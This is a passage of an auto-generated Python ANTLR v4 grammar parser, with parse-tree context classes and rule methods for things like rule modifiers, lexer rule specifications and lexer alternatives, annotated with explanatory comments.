        Matches: FINALLY actionBlock.  Returns the populated
        FinallyClauseContext.
        """
        localctx = ANTLRv4Parser.FinallyClauseContext(self, self._ctx, self.state)
        self.enterRule(localctx, 42, self.RULE_finallyClause)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 327
            self.match(ANTLRv4Parser.FINALLY)
            self.state = 328
            self.actionBlock()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RulePrequelContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'rulePrequel' rule:
        #   optionsSpec | ruleAction

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def optionsSpec(self):
            return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)

        def ruleAction(self):
            return self.getTypedRuleContext(ANTLRv4Parser.RuleActionContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_rulePrequel

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRulePrequel" ):
                listener.enterRulePrequel(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRulePrequel" ):
                listener.exitRulePrequel(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRulePrequel" ):
                return visitor.visitRulePrequel(self)
            else:
                return visitor.visitChildren(self)
    def rulePrequel(self):
        """Parse the 'rulePrequel' rule (auto-generated ANTLR code).

        Matches: optionsSpec | ruleAction, selected by one token of
        lookahead (OPTIONS vs AT).  Raises NoViableAltException (caught
        below as a RecognitionException) when neither alternative applies.
        """
        localctx = ANTLRv4Parser.RulePrequelContext(self, self._ctx, self.state)
        self.enterRule(localctx, 44, self.RULE_rulePrequel)
        try:
            self.state = 332
            self._errHandler.sync(self)
            token = self._input.LA(1)
            if token in [ANTLRv4Parser.OPTIONS]:
                # Alternative 1: optionsSpec
                self.enterOuterAlt(localctx, 1)
                self.state = 330
                self.optionsSpec()
                pass
            elif token in [ANTLRv4Parser.AT]:
                # Alternative 2: ruleAction
                self.enterOuterAlt(localctx, 2)
                self.state = 331
                self.ruleAction()
                pass
            else:
                raise NoViableAltException(self)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleReturnsContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleReturns' rule:
        #   RETURNS argActionBlock

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def RETURNS(self):
            return self.getToken(ANTLRv4Parser.RETURNS, 0)

        def argActionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleReturns

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleReturns" ):
                listener.enterRuleReturns(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleReturns" ):
                listener.exitRuleReturns(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleReturns" ):
                return visitor.visitRuleReturns(self)
            else:
                return visitor.visitChildren(self)
    def ruleReturns(self):
        """Parse the 'ruleReturns' rule (auto-generated ANTLR code).

        Matches: RETURNS argActionBlock.  Returns the populated
        RuleReturnsContext.
        """
        localctx = ANTLRv4Parser.RuleReturnsContext(self, self._ctx, self.state)
        self.enterRule(localctx, 46, self.RULE_ruleReturns)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 334
            self.match(ANTLRv4Parser.RETURNS)
            self.state = 335
            self.argActionBlock()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class ThrowsSpecContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'throwsSpec' rule:
        #   THROWS identifier (COMMA identifier)*

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def THROWS(self):
            return self.getToken(ANTLRv4Parser.THROWS, 0)

        def identifier(self, i:int=None):
            # With i=None returns all identifier children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)

        def COMMA(self, i:int=None):
            # With i=None returns all COMMA tokens, otherwise the i-th one.
            if i is None:
                return self.getTokens(ANTLRv4Parser.COMMA)
            else:
                return self.getToken(ANTLRv4Parser.COMMA, i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_throwsSpec

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterThrowsSpec" ):
                listener.enterThrowsSpec(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitThrowsSpec" ):
                listener.exitThrowsSpec(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitThrowsSpec" ):
                return visitor.visitThrowsSpec(self)
            else:
                return visitor.visitChildren(self)
    def throwsSpec(self):
        """Parse the 'throwsSpec' rule (auto-generated ANTLR code).

        Matches: THROWS identifier (COMMA identifier)*.  Returns the
        populated ThrowsSpecContext.
        """
        localctx = ANTLRv4Parser.ThrowsSpecContext(self, self._ctx, self.state)
        self.enterRule(localctx, 48, self.RULE_throwsSpec)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 337
            self.match(ANTLRv4Parser.THROWS)
            self.state = 338
            self.identifier()
            # (COMMA identifier)* : additional thrown identifiers.
            self.state = 343
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.COMMA:
                self.state = 339
                self.match(ANTLRv4Parser.COMMA)
                self.state = 340
                self.identifier()
                self.state = 345
                self._errHandler.sync(self)
                _la = self._input.LA(1)

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LocalsSpecContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'localsSpec' rule:
        #   LOCALS argActionBlock

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def LOCALS(self):
            return self.getToken(ANTLRv4Parser.LOCALS, 0)

        def argActionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_localsSpec

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLocalsSpec" ):
                listener.enterLocalsSpec(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLocalsSpec" ):
                listener.exitLocalsSpec(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLocalsSpec" ):
                return visitor.visitLocalsSpec(self)
            else:
                return visitor.visitChildren(self)
    def localsSpec(self):
        """Parse the 'localsSpec' rule (auto-generated ANTLR code).

        Matches: LOCALS argActionBlock.  Returns the populated
        LocalsSpecContext.
        """
        localctx = ANTLRv4Parser.LocalsSpecContext(self, self._ctx, self.state)
        self.enterRule(localctx, 50, self.RULE_localsSpec)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 346
            self.match(ANTLRv4Parser.LOCALS)
            self.state = 347
            self.argActionBlock()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleActionContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleAction' rule:
        #   AT identifier actionBlock

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def AT(self):
            return self.getToken(ANTLRv4Parser.AT, 0)

        def identifier(self):
            return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

        def actionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleAction

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleAction" ):
                listener.enterRuleAction(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleAction" ):
                listener.exitRuleAction(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleAction" ):
                return visitor.visitRuleAction(self)
            else:
                return visitor.visitChildren(self)
    def ruleAction(self):
        """Parse the 'ruleAction' rule (auto-generated ANTLR code).

        Matches: AT identifier actionBlock.  Returns the populated
        RuleActionContext.
        """
        localctx = ANTLRv4Parser.RuleActionContext(self, self._ctx, self.state)
        self.enterRule(localctx, 52, self.RULE_ruleAction)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 349
            self.match(ANTLRv4Parser.AT)
            self.state = 350
            self.identifier()
            self.state = 351
            self.actionBlock()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleModifiersContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleModifiers' rule:
        #   ruleModifier+

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def ruleModifier(self, i:int=None):
            # With i=None returns all ruleModifier children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.RuleModifierContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.RuleModifierContext,i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleModifiers

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleModifiers" ):
                listener.enterRuleModifiers(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleModifiers" ):
                listener.exitRuleModifiers(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleModifiers" ):
                return visitor.visitRuleModifiers(self)
            else:
                return visitor.visitChildren(self)
    def ruleModifiers(self):
        """Parse the 'ruleModifiers' rule (auto-generated ANTLR code).

        Matches: ruleModifier+ (one or more of FRAGMENT / PROTECTED /
        PUBLIC / PRIVATE).  Returns the populated RuleModifiersContext.
        """
        localctx = ANTLRv4Parser.RuleModifiersContext(self, self._ctx, self.state)
        self.enterRule(localctx, 54, self.RULE_ruleModifiers)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 354
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # ruleModifier+ : loop until the lookahead is no longer a modifier token.
            while True:
                self.state = 353
                self.ruleModifier()
                self.state = 356
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0)):
                    break

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleModifierContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleModifier' rule:
        #   PUBLIC | PRIVATE | PROTECTED | FRAGMENT

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def PUBLIC(self):
            return self.getToken(ANTLRv4Parser.PUBLIC, 0)

        def PRIVATE(self):
            return self.getToken(ANTLRv4Parser.PRIVATE, 0)

        def PROTECTED(self):
            return self.getToken(ANTLRv4Parser.PROTECTED, 0)

        def FRAGMENT(self):
            return self.getToken(ANTLRv4Parser.FRAGMENT, 0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleModifier

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleModifier" ):
                listener.enterRuleModifier(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleModifier" ):
                listener.exitRuleModifier(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleModifier" ):
                return visitor.visitRuleModifier(self)
            else:
                return visitor.visitChildren(self)
    def ruleModifier(self):
        """Parse the 'ruleModifier' rule (auto-generated ANTLR code).

        Matches a single modifier token set: PUBLIC | PRIVATE | PROTECTED |
        FRAGMENT.  On a mismatch the error handler attempts in-line
        recovery.  Returns the populated RuleModifierContext.
        """
        localctx = ANTLRv4Parser.RuleModifierContext(self, self._ctx, self.state)
        self.enterRule(localctx, 56, self.RULE_ruleModifier)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 358
            _la = self._input.LA(1)
            # Accept any one of the four modifier tokens via a bit-set test.
            if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0)):
                self._errHandler.recoverInline(self)
            else:
                self._errHandler.reportMatch(self)
                self.consume()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleBlockContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleBlock' rule:
        #   ruleAltList

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def ruleAltList(self):
            return self.getTypedRuleContext(ANTLRv4Parser.RuleAltListContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleBlock

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleBlock" ):
                listener.enterRuleBlock(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleBlock" ):
                listener.exitRuleBlock(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleBlock" ):
                return visitor.visitRuleBlock(self)
            else:
                return visitor.visitChildren(self)
    def ruleBlock(self):
        """Parse the 'ruleBlock' rule (auto-generated ANTLR code).

        Matches: ruleAltList (a pass-through wrapper rule).  Returns the
        populated RuleBlockContext.
        """
        localctx = ANTLRv4Parser.RuleBlockContext(self, self._ctx, self.state)
        self.enterRule(localctx, 58, self.RULE_ruleBlock)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 360
            self.ruleAltList()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class RuleAltListContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'ruleAltList' rule:
        #   labeledAlt (OR labeledAlt)*
        # Labeled element: 'alts' collects every labeledAlt child in order.

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser
            self._labeledAlt = None # LabeledAltContext
            self.alts = list() # of LabeledAltContexts

        def labeledAlt(self, i:int=None):
            # With i=None returns all labeledAlt children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.LabeledAltContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.LabeledAltContext,i)

        def OR(self, i:int=None):
            # With i=None returns all OR tokens, otherwise the i-th one.
            if i is None:
                return self.getTokens(ANTLRv4Parser.OR)
            else:
                return self.getToken(ANTLRv4Parser.OR, i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_ruleAltList

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterRuleAltList" ):
                listener.enterRuleAltList(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitRuleAltList" ):
                listener.exitRuleAltList(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitRuleAltList" ):
                return visitor.visitRuleAltList(self)
            else:
                return visitor.visitChildren(self)
    def ruleAltList(self):
        """Parse the 'ruleAltList' rule (auto-generated ANTLR code).

        Matches: labeledAlt (OR labeledAlt)*, accumulating each parsed
        alternative into localctx.alts.  Returns the populated
        RuleAltListContext.
        """
        localctx = ANTLRv4Parser.RuleAltListContext(self, self._ctx, self.state)
        self.enterRule(localctx, 60, self.RULE_ruleAltList)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 362
            localctx._labeledAlt = self.labeledAlt()
            localctx.alts.append(localctx._labeledAlt)
            # (OR labeledAlt)* : remaining alternatives separated by '|'.
            self.state = 367
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.OR:
                self.state = 363
                self.match(ANTLRv4Parser.OR)
                self.state = 364
                localctx._labeledAlt = self.labeledAlt()
                localctx.alts.append(localctx._labeledAlt)
                self.state = 369
                self._errHandler.sync(self)
                _la = self._input.LA(1)

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LabeledAltContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'labeledAlt' rule:
        #   alternative (POUND identifier)?

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def alternative(self):
            return self.getTypedRuleContext(ANTLRv4Parser.AlternativeContext,0)

        def POUND(self):
            return self.getToken(ANTLRv4Parser.POUND, 0)

        def identifier(self):
            return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_labeledAlt

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLabeledAlt" ):
                listener.enterLabeledAlt(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLabeledAlt" ):
                listener.exitLabeledAlt(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLabeledAlt" ):
                return visitor.visitLabeledAlt(self)
            else:
                return visitor.visitChildren(self)
    def labeledAlt(self):
        """Parse the 'labeledAlt' rule (auto-generated ANTLR code).

        Matches: alternative (POUND identifier)? — an alternative with an
        optional '# label' suffix.  Returns the populated LabeledAltContext.
        """
        localctx = ANTLRv4Parser.LabeledAltContext(self, self._ctx, self.state)
        self.enterRule(localctx, 62, self.RULE_labeledAlt)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 370
            self.alternative()
            # (POUND identifier)? : optional alternative label.
            self.state = 373
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.POUND:
                self.state = 371
                self.match(ANTLRv4Parser.POUND)
                self.state = 372
                self.identifier()

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LexerRuleSpecContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'lexerRuleSpec' rule:
        #   DOC_COMMENT* FRAGMENT? TOKEN_REF COLON lexerRuleBlock SEMI
        # Labeled elements: 'docs' collects leading DOC_COMMENT tokens,
        # 'frag' holds the optional FRAGMENT token, 'name' the TOKEN_REF token.

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser
            self._DOC_COMMENT = None # Token
            self.docs = list() # of Tokens
            self.frag = None # Token
            self.name = None # Token

        def COLON(self):
            return self.getToken(ANTLRv4Parser.COLON, 0)

        def lexerRuleBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleBlockContext,0)

        def SEMI(self):
            return self.getToken(ANTLRv4Parser.SEMI, 0)

        def TOKEN_REF(self):
            return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)

        def DOC_COMMENT(self, i:int=None):
            # With i=None returns all DOC_COMMENT tokens, otherwise the i-th one.
            if i is None:
                return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
            else:
                return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)

        def FRAGMENT(self):
            return self.getToken(ANTLRv4Parser.FRAGMENT, 0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_lexerRuleSpec

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLexerRuleSpec" ):
                listener.enterLexerRuleSpec(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLexerRuleSpec" ):
                listener.exitLexerRuleSpec(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLexerRuleSpec" ):
                return visitor.visitLexerRuleSpec(self)
            else:
                return visitor.visitChildren(self)
    def lexerRuleSpec(self):
        """Parse the 'lexerRuleSpec' rule (auto-generated ANTLR code).

        Matches: DOC_COMMENT* FRAGMENT? TOKEN_REF COLON lexerRuleBlock SEMI.
        Returns the populated LexerRuleSpecContext.
        """
        localctx = ANTLRv4Parser.LexerRuleSpecContext(self, self._ctx, self.state)
        self.enterRule(localctx, 64, self.RULE_lexerRuleSpec)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            # DOC_COMMENT* : collect any leading documentation comments.
            self.state = 378
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.DOC_COMMENT:
                self.state = 375
                localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
                localctx.docs.append(localctx._DOC_COMMENT)
                self.state = 380
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            # FRAGMENT? : optional fragment-rule marker.
            self.state = 382
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.FRAGMENT:
                self.state = 381
                localctx.frag = self.match(ANTLRv4Parser.FRAGMENT)

            # TOKEN_REF COLON lexerRuleBlock SEMI
            self.state = 384
            localctx.name = self.match(ANTLRv4Parser.TOKEN_REF)
            self.state = 385
            self.match(ANTLRv4Parser.COLON)
            self.state = 386
            self.lexerRuleBlock()
            self.state = 387
            self.match(ANTLRv4Parser.SEMI)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LexerRuleBlockContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'lexerRuleBlock' rule:
        #   lexerAltList

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def lexerAltList(self):
            return self.getTypedRuleContext(ANTLRv4Parser.LexerAltListContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_lexerRuleBlock

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLexerRuleBlock" ):
                listener.enterLexerRuleBlock(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLexerRuleBlock" ):
                listener.exitLexerRuleBlock(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLexerRuleBlock" ):
                return visitor.visitLexerRuleBlock(self)
            else:
                return visitor.visitChildren(self)
    def lexerRuleBlock(self):
        """Parse the 'lexerRuleBlock' rule (auto-generated ANTLR code).

        Matches: lexerAltList (a pass-through wrapper rule).  Returns the
        populated LexerRuleBlockContext.
        """
        localctx = ANTLRv4Parser.LexerRuleBlockContext(self, self._ctx, self.state)
        self.enterRule(localctx, 66, self.RULE_lexerRuleBlock)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 389
            self.lexerAltList()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LexerAltListContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'lexerAltList' rule:
        #   lexerAlt (OR lexerAlt)*
        # Labeled element: 'alts' collects every lexerAlt child in order.

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser
            self._lexerAlt = None # LexerAltContext
            self.alts = list() # of LexerAltContexts

        def lexerAlt(self, i:int=None):
            # With i=None returns all lexerAlt children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.LexerAltContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.LexerAltContext,i)

        def OR(self, i:int=None):
            # With i=None returns all OR tokens, otherwise the i-th one.
            if i is None:
                return self.getTokens(ANTLRv4Parser.OR)
            else:
                return self.getToken(ANTLRv4Parser.OR, i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_lexerAltList

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLexerAltList" ):
                listener.enterLexerAltList(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLexerAltList" ):
                listener.exitLexerAltList(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLexerAltList" ):
                return visitor.visitLexerAltList(self)
            else:
                return visitor.visitChildren(self)
    def lexerAltList(self):
        """Parse the 'lexerAltList' rule (auto-generated ANTLR code).

        Matches: lexerAlt (OR lexerAlt)*, accumulating each parsed
        alternative into localctx.alts.  Returns the populated
        LexerAltListContext.
        """
        localctx = ANTLRv4Parser.LexerAltListContext(self, self._ctx, self.state)
        self.enterRule(localctx, 68, self.RULE_lexerAltList)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 391
            localctx._lexerAlt = self.lexerAlt()
            localctx.alts.append(localctx._lexerAlt)
            # (OR lexerAlt)* : remaining alternatives separated by '|'.
            self.state = 396
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.OR:
                self.state = 392
                self.match(ANTLRv4Parser.OR)
                self.state = 393
                localctx._lexerAlt = self.lexerAlt()
                localctx.alts.append(localctx._lexerAlt)
                self.state = 398
                self._errHandler.sync(self)
                _la = self._input.LA(1)

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LexerAltContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'lexerAlt' rule:
        #   lexerElements lexerCommands? | (empty alternative)

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def lexerElements(self):
            return self.getTypedRuleContext(ANTLRv4Parser.LexerElementsContext,0)

        def lexerCommands(self):
            return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandsContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_lexerAlt

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLexerAlt" ):
                listener.enterLexerAlt(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLexerAlt" ):
                listener.exitLexerAlt(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLexerAlt" ):
                return visitor.visitLexerAlt(self)
            else:
                return visitor.visitChildren(self)
    def lexerAlt(self):
        """Parse the 'lexerAlt' rule (auto-generated ANTLR code).

        Matches: lexerElements lexerCommands? | (empty).  The empty
        alternative is taken when the lookahead is SEMI, RPAREN, or OR;
        any other unexpected token raises NoViableAltException (caught
        below as a RecognitionException).
        """
        localctx = ANTLRv4Parser.LexerAltContext(self, self._ctx, self.state)
        self.enterRule(localctx, 70, self.RULE_lexerAlt)
        self._la = 0 # Token type
        try:
            self.state = 404
            self._errHandler.sync(self)
            token = self._input.LA(1)
            if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.LEXER_CHAR_SET, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.BEGIN_ACTION, ANTLRv4Parser.LPAREN, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
                # Alternative 1: lexerElements lexerCommands?
                self.enterOuterAlt(localctx, 1)
                self.state = 399
                self.lexerElements()
                # lexerCommands? : present when lookahead is '->' (RARROW).
                self.state = 401
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                if _la==ANTLRv4Parser.RARROW:
                    self.state = 400
                    self.lexerCommands()

                pass
            elif token in [ANTLRv4Parser.SEMI, ANTLRv4Parser.RPAREN, ANTLRv4Parser.OR]:
                # Alternative 2: empty alternative.
                self.enterOuterAlt(localctx, 2)

                pass
            else:
                raise NoViableAltException(self)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class LexerElementsContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'lexerElements' rule:
        #   lexerElement+
        # Labeled element: 'elements' collects every lexerElement child in order.

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser
            self._lexerElement = None # LexerElementContext
            self.elements = list() # of LexerElementContexts

        def lexerElement(self, i:int=None):
            # With i=None returns all lexerElement children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.LexerElementContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.LexerElementContext,i)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_lexerElements

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterLexerElements" ):
